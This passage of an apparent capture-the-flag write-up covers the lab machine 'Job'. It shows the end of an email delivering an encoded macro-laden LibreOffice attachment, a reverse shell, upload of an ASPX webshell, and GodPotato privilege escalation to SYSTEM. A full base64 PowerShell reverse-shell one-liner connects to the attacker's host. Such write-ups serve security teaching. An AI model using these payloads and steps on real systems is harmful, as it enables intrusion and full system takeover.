 -> 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
 -> 8QUzrDKsPd02Bm3EiiULxk+OzS2YtUFWtnL3Npykha5l3JncEvHWR2WO3r0TdO+fLP8BUEsHCBuj
 -> 1fbGAQAA0QMAAFBLAwQUAAAIAAAXbjZcXiqF23UGAAB1BgAAGAAAAFRodW1ibmFpbHMvdGh1bWJu
 -> YWlsLnBuZ4lQTkcNChoKAAAADUlIRFIAAAFqAAACAAgDAAAAnIHWcAAAAexQTFRFPTs+Vk5HWWZx
 -> bl5XbGNbdmdWZGhuamdnbWpma2lqY250bWxwbXF7dGxncm5sd3BoeXBpcnF0cnN7c3mFcX+Nen6H
 -> d4CJf4KHeoKNdoOQfYubgXVrg3t0gn57jHxzkH1wjIN8kIJ4hIKDgoeOjIuMgomQgIycgZCcjJGT
 -> jJObloyEkIyJmI+BmJKJkpKTlJaYlpqfnJeTm5mXm5uchJOkiJOhipiikZmjmp+kl6Cmn6CgnaSr
 -> lai7mqWynKu6ppaLpp6Xop6crJ2So6Cdr6KWqKOcs6COsKWavKuboaSlraeiqqqtp622qK20o7C+
 -> rbO0q7O6uK2itbCrv7CiurKqsLe5sri9vbu7nbHHorLCqbXCrbjFsrvEvcbOssPSucXRv8rTvczZ
 -> wLCfy7OfwbOkwbWpyr2vwrqyyb+10b+szMS80cO01ce61ci318m828294M+8wcXKwcjPzcnCxc3V
 -> yM3TwdHfytLb1czD08/J3dLI1djb3dnTytbhydvr0tvk293g0uDq1eTx2uf03On13O3/5NTG4NjO
 -> 6tzN493V6t3Q5OHc6+Tb8ejd4eXl4uXp5ujq7Ojh7u3t5O3y6e/y7vHz7Pv/8+vi8O7r8vDu/PPm
 -> +PPt9PPz8fX68/r++vfz///2/v7+AAAA////1/txywAABERJREFUeNrt19lLFVEcwHHbKCUju0XW
 -> bREz60rZckUDK0uyrmRlEbZq2WbYXtIqWdGieDVSWui6/f7TJuih3jIoevh8YRjOOczLh8OZmaLQ
 -> P6oIAWrUQo1aqFGjFmrUQo0atVCjFmrUqIUatVCjRi3UqIUaNWqhRi3UqIUaNWr9A+r+9z/ufdHS
 -> 9+tSz3hMn5qMoc4Yzd/7eaHw/ZnCqSnEs6G+uqvqUcRExJXq2+VTMTGTDKZjLJmZiHVdUVj0Mt6m
 -> 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
 ->
 -> ------=_MIME_BOUNDARY_000_245365--
 ->
 ->
 -> .
<-  250 Queued (13.110 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

I need to use --attach @[filename] so that bash will pass the contents of the file to --attach (otherwise it just sends the filename as the attachment).

After a minute or so, I get a connection:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.73 59542

PS C:\Program Files\LibreOffice\program> 

And I can grab user.txt:

PS C:\Users\jack.black\Desktop> cat user.txt
3c65d26d************************

Shell as system

Enumeration

Users

There’s nothing super interesting in jack.black’s home directory:

PS C:\Users\jack.black> tree /f
Folder PATH listing
Volume serial number is A9B2-0C2A
C:.
+---3D Objects
+---Contacts
+---Desktop
?       user.txt
?       
+---Documents
+---Downloads
+---Favorites
?   ?   Bing.url
?   ?   
?   +---Links
+---Links
?       Desktop.lnk
?       Downloads.lnk
?       
+---Music
+---Pictures
+---Saved Games
+---Searches
+---Videos

jack.black is a member of the Remote Desktop Users group:

PS C:\Users\jack.black> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes                                        
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
JOB\developers                         Alias            S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192    

I don’t have a password yet, so that doesn’t provide much at this point. jack.black is also in the JOB\developers group.

There are no other interesting users with home directories:

PS C:\Users> ls

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/10/2021   8:52 PM                .NET v2.0
d-----        11/10/2021   8:52 PM                .NET v2.0 Classic
d-----        11/10/2021   8:52 PM                .NET v4.5
d-----        11/10/2021   8:52 PM                .NET v4.5 Classic
d-----         11/9/2021   8:51 PM                Administrator
d-----        11/10/2021   8:52 PM                Classic .NET AppPool
d-----         4/16/2025  10:48 AM                jack.black
d-r---         9/15/2021   3:12 PM                Public  

Webserver

The webserver runs out of C:\inetpub:

PS C:\inetpub> ls

    Directory: C:\inetpub

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         11/9/2021   9:02 PM                custerr
d-----         4/16/2025  11:21 AM                DeviceHealthAttestation
d-----         4/16/2025  11:25 AM                history
d-----        11/10/2021   8:10 PM                logs
d-----        11/10/2021   8:52 PM                temp
d-----        11/10/2021   8:57 PM                wwwroot

wwwroot has the served files:

PS C:\inetpub\wwwroot> ls

    Directory: C:\inetpub\wwwroot

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/10/2021   8:52 PM                aspnet_client
d-----         11/9/2021   9:24 PM                assets
d-----         11/9/2021   9:24 PM                css
d-----         11/9/2021   9:24 PM                js
-a----        11/10/2021   9:01 PM            298 hello.aspx
-a----         11/7/2021   1:05 PM           3261 index.html 

It lines up nicely with what feroxbuster found earlier.

The developers group has full control over the wwwroot directory:

PS C:\inetpub\wwwroot> cacls .
C:\inetpub\wwwroot JOB\developers:(OI)(CI)F 
                   BUILTIN\IIS_IUSRS:(OI)(CI)R 
                   NT SERVICE\TrustedInstaller:(ID)F 
                   NT SERVICE\TrustedInstaller:(OI)(CI)(IO)(ID)F 
                   NT AUTHORITY\SYSTEM:(ID)F 
                   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F 
                   BUILTIN\Administrators:(ID)F 
                   BUILTIN\Administrators:(OI)(CI)(IO)(ID)F 
                   BUILTIN\Users:(ID)R 
                   BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)

                                                 GENERIC_READ
                                                 GENERIC_EXECUTE
 
                   CREATOR OWNER:(OI)(CI)(IO)(ID)F

Webshell as iis apppool\defaultapppool

I’ll grab an ASPX webshell from GitHub, save it on my host, start a Python webserver, and fetch it to Job:

PS C:\inetpub\wwwroot> iwr http://10.10.14.158/shell.aspx -outfile shell.aspx

It’s there:

image-20260122171623777

Clicking “Run” runs the command:

image-20260122171639261

The webserver is running as iis apppool\defaultapppool:

image-20260122171725133

I’ll also note that it has SeImpersonatePrivilege!

GodPotato

POC

With SeImpersonatePrivilege, I’ll use GodPotato to get execution as nt authority\system. I’ll grab the latest version from the releases page, save it to my host, and upload it to Job:

PS C:\inetpub\wwwroot> iwr http://10.10.14.158/GodPotato-NET4.exe -outfile gp.exe

Now I can just run it through the webshell:

image-20260122172314423

whoami shows system!

Shell

I wasn’t able to get a full PowerShell rev shell to run directly from the webshell, so I’ll save a copy in a file on my host:

oxdf@hacky$ cat shell.ps1 
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA1ADgAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

And upload it to Job:

PS C:\inetpub\wwwroot> curl http://10.10.14.158/shell.ps1 -outfile shell.ps1

Now I can test run it with powershell -ep bypass ./shell.ps1 2>&1 to make sure it works. Then it’s as simple as updating my GodPotato call to use it:

image-20260123090621438

It hangs for a second and then there’s a shell at nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 444
Listening on 0.0.0.0 444
Connection received on 10.129.234.73 56118

PS C:\windows\system32\inetsrv> whoami
nt authority\system

And I can get root.txt:

PS C:\users\administrator\desktop> cat root.txt
552fe8ea************************